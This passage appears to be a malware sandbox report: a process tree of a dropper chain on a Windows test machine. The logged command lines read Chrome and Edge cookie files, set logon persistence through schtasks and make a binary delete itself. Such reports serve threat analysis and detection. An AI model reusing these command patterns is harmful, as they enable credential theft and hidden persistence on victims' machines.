                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                10⤵
                                                                                                                  PID:6180
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                                                    11⤵
                                                                                                                      PID:6496
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping localhost -n 30
                                                                                                                  9⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:4724
                                                                                                          • C:\Users\Admin\Documents\3bhZaa06spCnp7D5I8bNvTds.exe
                                                                                                            "C:\Users\Admin\Documents\3bhZaa06spCnp7D5I8bNvTds.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4944
                                                                                                            • C:\Users\Admin\Documents\3bhZaa06spCnp7D5I8bNvTds.exe
                                                                                                              "C:\Users\Admin\Documents\3bhZaa06spCnp7D5I8bNvTds.exe"
                                                                                                              7⤵
                                                                                                                PID:5260
                                                                                                            • C:\Users\Admin\Documents\ks2Q9tM2hYWRZHIkGGTX32ke.exe
                                                                                                              "C:\Users\Admin\Documents\ks2Q9tM2hYWRZHIkGGTX32ke.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:4976
                                                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4936
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  8⤵
                                                                                                                    PID:4904
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                    8⤵
                                                                                                                      PID:6408
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      8⤵
                                                                                                                        PID:4208
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                          PID:6000
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                            PID:6784
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                            8⤵
                                                                                                                              PID:3480
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              8⤵
                                                                                                                                PID:4524
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                8⤵
                                                                                                                                  PID:5700
                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:832
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5856
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  8⤵
                                                                                                                                    PID:6468
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                    8⤵
                                                                                                                                      PID:7688
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      8⤵
                                                                                                                                        PID:804
                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:2300
                                                                                                                                    • C:\Users\Admin\Documents\4TSnLNRWX34xvugbX7aHcFwZ.exe
                                                                                                                                      "C:\Users\Admin\Documents\4TSnLNRWX34xvugbX7aHcFwZ.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      PID:1700
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 4TSnLNRWX34xvugbX7aHcFwZ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\4TSnLNRWX34xvugbX7aHcFwZ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                        7⤵
                                                                                                                                          PID:5776
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /im 4TSnLNRWX34xvugbX7aHcFwZ.exe /f
                                                                                                                                            8⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:4764
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /t 6
                                                                                                                                            8⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:4384
                                                                                                                                      • C:\Users\Admin\Documents\PMf61aSgvmUpniO7HPkqoCbp.exe
                                                                                                                                        "C:\Users\Admin\Documents\PMf61aSgvmUpniO7HPkqoCbp.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2224
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1969929.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1969929.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5360
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4229675.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4229675.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5404
                                                                                                                                      • C:\Users\Admin\Documents\3Uv1OuY6maSNaDzPzeBLuqIp.exe
                                                                                                                                        "C:\Users\Admin\Documents\3Uv1OuY6maSNaDzPzeBLuqIp.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4072
                                                                                                                                      • C:\Users\Admin\Documents\DralCIPQ38mwg2kvzXdXQN_X.exe
                                                                                                                                        "C:\Users\Admin\Documents\DralCIPQ38mwg2kvzXdXQN_X.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4708
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7544615.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7544615.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5420
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6209863.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6209863.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5456
                                                                                                                                      • C:\Users\Admin\Documents\fQt_1oEIJz81fbqhTrSpYpaL.exe
                                                                                                                                        "C:\Users\Admin\Documents\fQt_1oEIJz81fbqhTrSpYpaL.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:4520
                                                                                                                                      • C:\Users\Admin\Documents\GEPaKGHhbtMoNI92KMJjTY4G.exe
                                                                                                                                        "C:\Users\Admin\Documents\GEPaKGHhbtMoNI92KMJjTY4G.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5060
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-URDLP.tmp\GEPaKGHhbtMoNI92KMJjTY4G.tmp
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-URDLP.tmp\GEPaKGHhbtMoNI92KMJjTY4G.tmp" /SL5="$1025C,138429,56832,C:\Users\Admin\Documents\GEPaKGHhbtMoNI92KMJjTY4G.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:4056
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CQI1D.tmp\Setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CQI1D.tmp\Setup.exe" /Verysilent
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:5356
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                              9⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5752
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                10⤵
                                                                                                                                                  PID:6312
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  10⤵
                                                                                                                                                    PID:1492
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                  9⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4220
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4851016.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4851016.exe"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:6664
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5967994.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5967994.exe"
                                                                                                                                                      10⤵
                                                                                                                                                        PID:6688
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                          11⤵
                                                                                                                                                            PID:7124
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8393308.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8393308.exe"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:4780
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              11⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:6180
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7250541.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7250541.exe"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:6740
                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                            9⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:5632
                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628125712 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                              10⤵
                                                                                                                                                                PID:6112
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                              9⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:6116
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-K49UT.tmp\GameBoxWin32.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-K49UT.tmp\GameBoxWin32.tmp" /SL5="$202FC,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                10⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:6160
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-H33MA.tmp\Daldoula.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-H33MA.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:3632
                                                                                                                                                                    • C:\Program Files\Google\YDKDGNHFYU\ultramediaburner.exe
                                                                                                                                                                      "C:\Program Files\Google\YDKDGNHFYU\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:4484
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-5JT5S.tmp\ultramediaburner.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-5JT5S.tmp\ultramediaburner.tmp" /SL5="$7033C,281924,62464,C:\Program Files\Google\YDKDGNHFYU\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:5796
                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                              14⤵
                                                                                                                                                                                PID:7120
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\e6-363e2-b22-f9c8c-2b2dc5185ff0e\Tabaqopasi.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\e6-363e2-b22-f9c8c-2b2dc5185ff0e\Tabaqopasi.exe"
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:6884
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                dw20.exe -x -s 2256
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:688
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\e9-a29a1-54c-44691-e745ef80a1832\Namebuvefi.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\e9-a29a1-54c-44691-e745ef80a1832\Namebuvefi.exe"
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:6444
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uucqzqgl.jus\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                    13⤵
                                                                                                                                                                                      PID:5384
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sfslna2q.3cc\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:6088
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sfslna2q.3cc\installer.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\sfslna2q.3cc\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:7456
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tme0zmp2.ilf\ufgaa.exe & exit
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:7508
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tme0zmp2.ilf\ufgaa.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\tme0zmp2.ilf\ufgaa.exe
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:7888
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                    PID:7648
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                      PID:4100
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:7716
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                          PID:8160
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mrkcstdj.vxk\anyname.exe & exit
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:5224
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\mrkcstdj.vxk\anyname.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\mrkcstdj.vxk\anyname.exe
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:5080
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\mrkcstdj.vxk\anyname.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\mrkcstdj.vxk\anyname.exe" -q
                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                              PID:6848
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5plb4ete.us3\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:4888
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5808
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:5080
                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                              PID:4040
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0033B0C4\sonia_6.exe
                                                                                                                                                                                                sonia_6.exe
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:3972
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:2756
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:4604
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:7792
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:5904
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 492
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:3884
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:4064
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                              PID:8
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:3796
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:1164
                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                              PID:2208
                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:2152
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4344
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                schtasks.exe /create /tn "4229675" /sc ONLOGON /tr "'C:\Users\Admin\Music\4229675.exe'" /rl HIGHEST /f
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:6328
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9297.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9297.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:7068
                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\cmd.exe'" /rl HIGHEST /f
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:5332
                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 3F5E8D65464FBC03C276AAA59A1AF794 C
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:6680
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 28E522090328B44873DE9AAD7B6C0D48
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:6516
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:5204
